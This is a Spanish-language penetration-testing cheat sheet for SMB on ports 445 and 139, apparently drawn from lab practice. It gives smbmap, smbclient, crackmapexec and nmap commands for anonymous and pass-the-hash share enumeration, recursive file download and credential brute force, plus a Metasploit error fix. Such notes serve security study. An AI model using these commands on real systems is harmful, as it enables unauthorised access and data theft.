SMB - (445-139)

What is an SMB Port + Ports 445 and 139 Explained

Listado de carpetas

Comandos recomendables para listar carpetas con usuario anonymous, credenciales validas y utilizando la técnica de pass the hash.

$ smbmap -H 10.10.10.111
[+] Guest session       IP: 10.11.1.231:445     Name: 10.11.1.231                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        home                                                    READ ONLY       Home
        docs                                                    READ ONLY       docs
        tmp                                                     READ ONLY       TMP
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.2.10-Debian)
                                                                                                                                                                                            
$ smbclient \\\\10.10.10.111\\home
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
$ smb: \> dir
  .                                   D        0  Sun Dec 27 23:20:35 2015
  ..                                  D        0  Sun Dec 27 23:09:11 2015
  folder08                              D        0  Fri Jan  2 06:13:55 2015
  folder02                              D        0  Fri Jan  2 07:44:26 2015

$ smbclient --no-pass -L //10.10.10.111
$ smbmap -u invalid -H 10.10.10.111
[+] Guest session       IP: 10.10.10.111:445    Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        
smbclient -U invalid //10.10.10.111/profiles\$
smbmap -H 192.168.0.1 [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash
crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user
crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Guest user
crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Guest user

nmap -p445 --script smb-vuln-*

# Validar version del SMB
crackmapexec smb 10.10.10.111

# Crear Diccionario apartir de nombres de carpetas de smb
smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt

# Filtrado de extension de ficheros con busqueda recursiva
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R

#Obtener version de SMB
/smbver.sh 10.10.10.111 139  
10.10.10.111: UnixSamba 227a

Descarga recursiva de archivos y carpetas de SMB

smb: \> promp on
smb: \> recurse on
smb: \> mget *

Fuerza bruta con usuario de contraseña

crackmapexec smb 10.10.10.111 -u users.txt -p users.txt --continue-on-success

Solucionar Error con Metasploit

[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.

## Solucion
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1